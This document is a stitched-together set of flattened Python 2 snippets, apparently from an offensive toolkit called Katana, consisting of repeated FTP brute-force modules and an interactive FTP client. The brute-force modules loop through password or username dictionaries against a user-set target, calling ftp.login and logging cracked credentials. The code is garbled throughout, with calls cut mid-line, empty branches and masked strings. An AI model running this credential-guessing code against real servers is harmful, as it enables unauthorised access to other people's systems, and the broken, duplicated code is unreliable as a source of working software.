def main(run): try: # HEAD MODULE if run: actions = raw_input(Message.prompt(initialize.CodeName)) else: actions = "run" if getFunction.KatanaCheckActionShowOptions(actions): getFunction.ShowOptions(initialize.DEFAULT_VARIABLE) elif getFunction.KatanaCheckActionSetValue(actions): initialize.DEFAULT_VARIABLE = getFunction.UpdateValue( actions, initialize.DEFAULT_VARIABLE) elif getFunction.KatanaCheckActionisBack(actions): return # END HEAD MODULE elif getFunction.runModule(actions): # CODE MODULE ############################################################################################ try: ftp = FTP(initialize.DEFAULT_VARIABLE[0][0]) if True: try: Message.loading_file() with open(initialize.DEFAULT_VARIABLE[3][0], 'r') as passwords: for password in passwords: password = password.replace("\n", "") try: ftp.login( initialize.DEFAULT_VARIABLE[2][0], password) if True: "BruteForceFTP", initialize.DEFAULT_VARIABLE[0][0], initialize.DEFAULT_VARIABLE[1][0], initialize.DEFAULT_VARIABLE[2][0], password) Message.Success( initialize.DEFAULT_VARIABLE[2][0], password) break except: print " " + Alr + " Checking (" + initialize.DEFAULT_VARIABLE[ 2][0] + "=" + password + ")" except: Errors.Errors(event=sys.exc_info(), info=initialize.DEFAULT_VARIABLE[3][0]) except: Errors.Errors(event=sys.exc_info(), info=initialize.DEFAULT_VARIABLE[0][0] + ":" + initialize.DEFAULT_VARIABLE[1][0]) # END CODE MODULE ############################################################################################ else: getFunction.KatanaCheckActionGlobalCommands(actions) # ERROR GENERAL except: Errors.Errors(event=sys.exc_info(), info=sys.exc_traceback.tb_lineno) # END ERROR GENERAL main(True)
def main(run): try: # HEAD MODULE if run: actions=raw_input(Message.prompt(initialize.CodeName)) else : actions="run" if getFunction.KatanaCheckActionShowOptions(actions) :getFunction.ShowOptions(initialize.DEFAULT_VARIABLE) elif getFunction.KatanaCheckActionSetValue(actions) :initialize.DEFAULT_VARIABLE=getFunction.UpdateValue(actions,initialize.DEFAULT_VARIABLE) elif getFunction.KatanaCheckActionisBack(actions) :return # END HEAD MODULE elif getFunction.runModule(actions): # CODE MODULE ############################################################################################ try: ftp = FTP(initialize.DEFAULT_VARIABLE[0][0]) if True: try: Message.loading_file() with open(initialize.DEFAULT_VARIABLE[3][0],'r') as passwords: for password in passwords: password=password.replace("\n","") try: ftp.login(initialize.DEFAULT_VARIABLE[2][0],password) if True:"BruteForceFTP",initialize.DEFAULT_VARIABLE[0][0],initialize.DEFAULT_VARIABLE[1][0],initialize.DEFAULT_VARIABLE[2][0],password) Message.Success(initialize.DEFAULT_VARIABLE[2][0],password) break except: print " "+Alr+" Checking ("+initialize.DEFAULT_VARIABLE[2][0]+"="+password+")" except: Errors.Errors(event=sys.exc_info(), info=initialize.DEFAULT_VARIABLE[3][0]) except: Errors.Errors(event=sys.exc_info(), info=initialize.DEFAULT_VARIABLE[0][0]+":"+initialize.DEFAULT_VARIABLE[1][0]) # END CODE MODULE ############################################################################################ else: getFunction.KatanaCheckActionGlobalCommands(actions) # ERROR GENERAL except: Errors.Errors(event=sys.exc_info(), info=sys.exc_traceback.tb_lineno) # END ERROR GENERAL main(True)
def btftp(run): try: global defaulthost, defaultport, defaultuser, defaultdicc if run != 1: actions = raw_input(d.prompt("bt/ftp")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("user", "yes", "Username", defaultuser) d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc) btftp(0) elif actions[0:10] == "set target": defaulthost = defaulthost.replace("http://", "") defaulthost = ping.update(defaulthost, actions, "target") d.change("target", defaulthost) elif actions[0:8] == "set port": defaultport = ping.update(defaultport, actions, "port") d.change("port", defaultport) elif actions[0:8] == "set user": defaultuser = ping.update(defaultuser, actions, "user") d.change("user", defaultuser) elif actions[0:10] == "set dict_1": defaultdicc = ping.update(defaultdicc, actions, "dict_1") d.change("dict_1", defaultdicc) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": try: ftp = FTP(defaulthost) if True: try: d.loading_file() try: with open(defaultdicc, 'r') as passs: for ps in passs: ps = ps.replace("\n", "") try: ftp.login(defaultuser, ps) if True:"BruteForceFTP", defaulthost, defaultport, defaultuser, ps) d.Success(defaultuser, ps) return 1 except: print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")" except: Errors.Errors(event=sys.exc_info()[0], info=defaultdicc) except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost + ":" + defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) btftp(0)
def btftp(): try: global defaulthost,defaultport,defaultdic1,defaultdic2 actions = raw_input(O+" ktn/bt/ftp > "+W) if actions == "show options": print "" print " ["+R+"+"+W+"] options" print " |target : yes" print " |port : no/yes" print " |dictionaries : no/yes\n" print "" print " ["+G+"+"+W+"] options current" print " |target : ",defaulthost print " |port : ",defaultport print " |dictionary_1 : ",defaultdic1 print " |dictionary_2 : ",defaultdic2 print "" btftp() elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") print " target : "+defaulthost+" "+O+" Saved!!!"+W btftp() elif actions[0:8] == "set port": defaultport = actions[9:] print " port : "+defaultport+" "+O+" Saved!!!"+W btftp() elif actions[0:16] == "set dictionary_1": defaultdic1 = actions[17:] print " dictionary_1 : "+defaultdic1+" "+O+" Saved!!!"+W btftp() elif actions[0:16] == "set dictionary_2": defaultdic2 = actions[17:] print " dictionary_2 : "+defaultdic2+" "+O+" Saved!!!"+W btftp() elif actions=="back": pass elif actions=="exit": print C+" GooD"+W+" bye." exit() elif actions == "help": if actions == "run": print("\n ["+O+"!"+W+"] Checking file") if True: if True: print " ["+G+"+"+W+"] options current" print " target : ",defaulthost print " port : ",defaultport print " dictionary_1 : ",defaultdic1 print " dictionary_2 : ",defaultdic2 print "" try: ftp = FTP(defaulthost) if True: print(" ["+G+"+"+W+"] target LIVE") print(" ["+G+"+"+W+"] Running") try: with open(defaultdic1,'r') as user: for us in user: with open(defaultdic2,'r') as passs: for ps in passs: us=us.replace("\n","") ps=ps.replace("\n","") try: ftp.login(us,ps) if True: log=open('core/logs/logsBruteForce.log','a') log.write('\n ===================================== ') log.write('\n Module : BruteForceFTP') log.write('\n Data : '+time.strftime('%c')) log.write('\n target : '+defaulthost) log.write('\n port : '+defaultport) log.write('\n Cracked : username : '******' , password : '+ps) log.close() print " ["+G+"+"+W+"] Successfully with username : "******" , password : "******"\n" return except(KeyboardInterrupt, SystemExit): print(" ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit") except: print " ["+O+"!"+W+"] Checking with username : "******" , password : "******" ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit") except: print(" ["+R+"-"+W+"] target off") else: print " ["+O+"!"+W+"] command No Accept"+W except(KeyboardInterrupt, SystemExit): print(" ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit") btftp()
def btftp(run): try: global defaulthost, defaultport, defaultuser, defaultdicc if run != 1: actions = raw_input(d.prompt("bt/ftp")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("user", "yes", "Username", defaultuser) d.descrip("dict_1", "yes", "Dictionary pass", defaultdicc) print "" btftp(0) elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target", defaulthost) btftp(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port", defaultport) btftp(0) elif actions[0:8] == "set user": defaultuser = actions[9:] d.change("user", defaultuser) btftp(0) elif actions[0:10] == "set dict_1": defaultdicc = actions[11:] d.change("dict_1", defaultdicc) btftp(0) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": elif actions == "back" or actions == "b": return return elif actions == "run" or actions == "r": try: ftp = FTP(defaulthost) if True: try: d.loading() try: with open(defaultdicc, 'r') as passs: for ps in passs: ps = ps.replace("\n", "") try: ftp.login(defaultuser, ps) if True:"BruteForceFTP", defaulthost, defaultport, defaultuser, ps) print "\n-" + Suf + " Successfully with (" + defaultuser + "=" + ps + ")\n" return 1 except: print " " + Alr + " Checking (" + defaultuser + "=" + ps + ")" except: d.filenot(defaultdicc) btpop3(0) except: d.kbi() except: else: d.nocommand() except: d.kbi() exit() btftp(0)
def btftp(run): try: global defaulthost,defaultport,defaultuser,defaultdicc if run!=1: actions=raw_input(d.prompt("bt/ftp")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) d.descrip("user","yes","Username",defaultuser) d.descrip("dict_1","yes","Dictionary pass",defaultdicc) print "" btftp(0) elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target",defaulthost) btftp(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port",defaultport) btftp(0) elif actions[0:8] == "set user": defaultuser = actions[9:] d.change("user",defaultuser) btftp(0) elif actions[0:10] == "set dict_1": defaultdicc = actions[11:] d.change("dict_1",defaultdicc) btftp(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": try: ftp = FTP(defaulthost) if True: try: d.loading() try: with open(defaultdicc,'r') as passs: for ps in passs: ps=ps.replace("\n","") try: ftp.login(defaultuser,ps) if True:"BruteForceFTP",defaulthost,defaultport,defaultuser,ps) print "\n-"+Suf+" Successfully with ("+defaultuser+"="+ps+")\n" return 1 except: print " "+Alr+" Checking ("+defaultuser+"="+ps+")" except: d.filenot(defaultdicc) btpop3(0) except: d.kbi() except: else: d.nocommand() except: d.kbi() exit() btftp(0)
def cftp(run): try: global defaulthost, defaultport, defaultuser, defaultpass if run != 1: actions = raw_input(d.prompt("clt/ftp")) else: actions = "run" if actions == "show options" or actions == "sop": d.option() d.descrip("target", "yes", "IP or DNS", defaulthost) d.descrip("port", "no", "Port of target", defaultport) d.descrip("user", "yes", "Username", defaultuser) d.descrip("pass", "yes", "Password", defaultpass) print "" cftp(0) elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target", defaulthost) cftp(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port", defaultport) cftp(0) elif actions[0:8] == "set user": defaultuser = actions[9:] d.change("user", defaultuser) cftp(0) elif actions[0:8] == "set pass": defaultpass = actions[9:] d.change("pass", defaultpass) cftp(0) elif actions == "exit" or actions == "x": d.goodbye() exit() elif actions == "help" or actions == "h": elif actions == "back" or actions == "b": return elif actions == "run" or actions == "r": try: ftp = FTP(defaulthost) if True: try: ftp.login(defaultuser, defaultpass) if True: try: cmd = "nop" patch = "" print "\n " + Hlp + " FTP Client help\n" print " ----------------------------------------" print " |" + colors[6] + "Commd" + colors[ 0] + "| " + colors[ 6] + "Description" + colors[ 0] + " | " + colors[ 6] + "Examples" + colors[ 0] + " |" print " ----------------------------------------" print " |ls | list files | ls |" print " |cd | change dir | cd css |" print " |mk | create dir | mk images |" print " |rm | remove file | remove config.js | " print " |rmd | remove dir | remove sex |" print " |get | get file | get index.php |" print " |put | up file | put login.php |" print " ----------------------------------------" print "" while (cmd != "exit"): cmd = raw_input(colors[1] + " CLT~" + colors[3] + "ftp/" + patch + "> " + colors[0]) if cmd == "ls": ftp.retrlines("LIST") if cmd[0:2] == "cd": try: ftp.cwd(cmd[3:]) if True: patch = cmd[3:] if patch == "..": patch = "" except: print " [" + colors[1] + "-" + colors[ 0] + "] Error: directory wrong." if cmd[0:3] == "get": lfile = cmd[4:].replace("\n", "") try: ftp.retrbinary( 'RETR ' + lfile, open(lfile, 'wb').write) if True: subprocess.Popen( "cp " + lfile + " /root/Desktop/;rm " + lfile + "", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() print " [" + colors[1] + "-" + colors[ 0] + "] Saved, /root/Desktop/" + lfile except: print " [" + colors[1] + "-" + colors[ 0] + "] Error: file not found." if cmd[0:3] == "put": lfile = cmd[4:].replace("\n", "") w = open(lfile, 'rb') try: ftp.storbinary("STOR r.r", w) except: print " [" + colors[ 1] + "-" + colors[ 0] + "] Error: file wrong." if cmd[0:2] == "rm": try: ftp.delete(cmd[3:]) except: print " [" + colors[1] + "-" + colors[ 0] + "] Error: file not found." if cmd[0:3] == "rmd": pat = cmd[4:].replace("\n", "") ftp.rmd(pat) if cmd[0:2] == "mk": try: ftp.mkd(cmd[3:]) except: print " [" + colors[1] + "-" + colors[ 0] + "] Error: directory wrong." except (KeyboardInterrupt): d.kbi() except Exception, e: print( " [" + colors[1] + "-" + colors[0] + "] Timeout.", e) except: d.nomatch() except: else: d.nocommand() except: d.kbi() exit() cftp(0)
def cftp(run): try: global defaulthost,defaultport,defaultuser,defaultpass if run!=1: actions=raw_input(d.prompt("clt/ftp")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) d.descrip("user","yes","Username",defaultuser) d.descrip("pass","yes","Password",defaultpass) print "" cftp(0) elif actions[0:10] == "set target": defaulthost = actions[11:] defaulthost = defaulthost.replace("http://", "") d.change("target",defaulthost) cftp(0) elif actions[0:8] == "set port": defaultport = actions[9:] d.change("port",defaultport) cftp(0) elif actions[0:8] == "set user": defaultuser = actions[9:] d.change("user",defaultuser) cftp(0) elif actions[0:8] == "set pass": defaultpass = actions[9:] d.change("pass",defaultpass) cftp(0) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": elif actions=="back" or actions=="b": return elif actions=="run" or actions=="r": try: ftp = FTP(defaulthost) if True: try: ftp.login(defaultuser,defaultpass) if True: try: cmd="nop" patch="" print "\n "+Hlp+" FTP Client help\n" print " ----------------------------------------" print " |"+colors[6]+"Commd"+colors[0]+"| "+colors[6]+"Description"+colors[0]+" | "+colors[6]+"Examples"+colors[0]+" |" print " ----------------------------------------" print " |ls | list files | ls |" print " |cd | change dir | cd css |" print " |mk | create dir | mk images |" print " |rm | remove file | remove config.js | " print " |rmd | remove dir | remove sex |" print " |get | get file | get index.php |" print " |put | up file | put login.php |" print " ----------------------------------------" print "" while(cmd!="exit"): cmd = raw_input(colors[1]+" CLT~"+colors[3]+"ftp/"+patch+"> "+colors[0]) if cmd == "ls": ftp.retrlines("LIST") if cmd[0:2] == "cd": try: ftp.cwd(cmd[3:]) if True: patch=cmd[3:] if patch == "..": patch="" except: print " ["+colors[1]+"-"+colors[0]+"] Error: directory wrong." if cmd[0:3] == "get": lfile=cmd[4:].replace("\n","") try: ftp.retrbinary('RETR '+lfile,open(lfile,'wb').write) if True: subprocess.Popen("cp "+lfile+" /root/Desktop/;rm "+lfile+"", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() print " ["+colors[1]+"-"+colors[0]+"] Saved, /root/Desktop/"+lfile except: print " ["+colors[1]+"-"+colors[0]+"] Error: file not found." if cmd[0:3] == "put": lfile=cmd[4:].replace("\n","") w = open(lfile, 'rb') try: ftp.storbinary("STOR r.r",w) except: print " ["+colors[1]+"-"+colors[0]+"] Error: file wrong." if cmd[0:2] == "rm": try: ftp.delete(cmd[3:]) except: print " ["+colors[1]+"-"+colors[0]+"] Error: file not found." if cmd[0:3] == "rmd": pat=cmd[4:].replace("\n","") ftp.rmd(pat) if cmd[0:2] == "mk": try: ftp.mkd(cmd[3:]) except: print " ["+colors[1]+"-"+colors[0]+"] Error: directory wrong." except(KeyboardInterrupt): d.kbi() except Exception,e: print(" ["+colors[1]+"-"+colors[0]+"] Timeout.", e) except: d.nomatch() except: else: d.nocommand() except: d.kbi() exit() cftp(0)
def btftp(run): try: global defaulthost,defaultport,defaultuser,defaultdicc if run!=1: actions=raw_input(d.prompt("bt/ftp")) else: actions="run" if actions == "show options" or actions == "sop": d.option() d.descrip("target","yes","IP or DNS",defaulthost) d.descrip("port","no","Port of target",defaultport) d.descrip("user","yes","Username",defaultuser) d.descrip("dict_1","yes","Dictionary pass",defaultdicc) btftp(0) elif actions[0:10] == "set target": defaulthost=defaulthost.replace("http://", "") defaulthost=ping.update(defaulthost,actions,"target") d.change("target",defaulthost) elif actions[0:8] == "set port": defaultport=ping.update(defaultport,actions,"port") d.change("port",defaultport) elif actions[0:8] == "set user": defaultuser=ping.update(defaultuser,actions,"user") d.change("user",defaultuser) elif actions[0:10] == "set dict_1": defaultdicc=ping.update(defaultdicc,actions,"dict_1") d.change("dict_1",defaultdicc) elif actions=="exit" or actions=="x": d.goodbye() exit() elif actions=="help" or actions=="h": elif actions=="back" or actions=="b": return return elif actions=="run" or actions=="r": try: ftp = FTP(defaulthost) if True: try: d.loading_file() try: with open(defaultdicc,'r') as passs: for ps in passs: ps=ps.replace("\n","") try: ftp.login(defaultuser,ps) if True:"BruteForceFTP",defaulthost,defaultport,defaultuser,ps) d.Success(defaultuser,ps) return 1 except: print " "+Alr+" Checking ("+defaultuser+"="+ps+")" except: Errors.Errors(event=sys.exc_info()[0], info=defaultdicc) except: Errors.Errors(event=sys.exc_info()[0], info=False) except: Errors.Errors(event=sys.exc_info()[0], info=defaulthost+":"+defaultport) else: d.No_actions() except: Errors.Errors(event=sys.exc_info()[0], info=False) btftp(0)
def cftp(): try: global defaulthost,defaultport,defaultdat1,defaultdat2 actions = raw_input(O+" ktn/clt/ftp > "+W) if actions == "show options": print "" print " ["+R+"+"+W+"] options" print " |host : yes" print " |port : no/yes" print " |username : yes" print " |password : yes\n" print "" print " ["+G+"+"+W+"] options current" print " |host : ",defaulthost print " |port : ",defaultport print " |username : "******" |password : "******"" cftp() elif actions[0:8] == "set host": defaulthost = actions[9:] print " host : "+defaulthost+" "+O+" Saved!!!"+W cftp() elif actions[0:8] == "set port": defaultport= actions[9:] print " port : "+defaultport+" "+O+" Saved!!!"+W cftp() elif actions[0:12] == "set username": defaultdat1 = actions[13:] print " username : "******" "+O+" Saved!!!"+W cftp() elif actions[0:12] == "set password": defaultdat2= actions[13:] print " password : "******" "+O+" Saved!!!"+W cftp() elif actions=="back": return elif actions=="exit": print C+" GooD"+W+" bye." exit() elif actions == "help": elif actions == "run": print("\n ["+O+"!"+W+"] Checking target") print " ["+G+"+"+W+"] options current" print " host : ",defaulthost print " port : ",defaultport print " username : "******" password : "******"" try: ftp = FTP(defaulthost) if True: try: print(" ["+G+"+"+W+"] host LIVE") print(" ["+G+"+"+W+"] Running") ftp.login(defaultdat1,defaultdat2) if True: try: cmd="nop" patch="" print "\n ["+B+"*"+W+"] FTP Client help\n" print " ls : list files ex: ls" print " cd : change dir ex: cd web/site" print " mk : create dir ex: mk images" print " rm : remove file ex: remove config.js" print " rmd : remove dir ex: remove sex" print " get : get file ex: get index.php" print " put : up file ex: put login.php" while(cmd!="exit"): cmd = raw_input(O+" ftp/"+patch+"> "+W) if cmd == "ls": ftp.retrlines("LIST") if cmd[0:2] == "cd": try: ftp.cwd(cmd[3:]) if True: patch=cmd[3:] if patch == "..": patch="" except: print " ["+O+"!"+W+"] Error: diretory wrong" if cmd[0:3] == "get": lfile=cmd[4:].replace("\n","") try: ftp.retrbinary('RETR '+lfile,open(lfile,'wb').write) if True: subprocess.Popen("cp "+lfile+" /root/Desktop/;rm "+lfile+"", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() print " ["+O+"!"+W+"] Saved, /root/Desktop/"+lfile except: print " ["+O+"!"+W+"] Error: file wrong" if cmd[0:3] == "put": lfile=cmd[4:].replace("\n","") w = open(lfile, 'rb') try: ftp.storbinary("STOR r.r",w) except: print " ["+O+"!"+W+"] Error: file wrong" if cmd[0:2] == "rm": try: ftp.delete(cmd[3:]) except: print " ["+O+"!"+W+"] Error: file wrong" if cmd[0:3] == "rmd": pat=cmd[4:].replace("\n","") ftp.rmd(pat) if cmd[0:2] == "mk": try: ftp.mkd(cmd[3:]) except: print " ["+O+"!"+W+"] Error: diretory wrong" except(KeyboardInterrupt): print("\n ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit") except Exception,e: print(" ["+R+"-"+W+"] Timeout", e) except: print(" ["+R+"-"+W+"] username or password Wrong") except: print(" ["+R+"-"+W+"] target off") else: print " ["+O+"!"+W+"] command No Accept"+W except(KeyboardInterrupt): print("\n ["+O+"!"+W+"] (Ctrl + C) Detected, System Exit") cftp()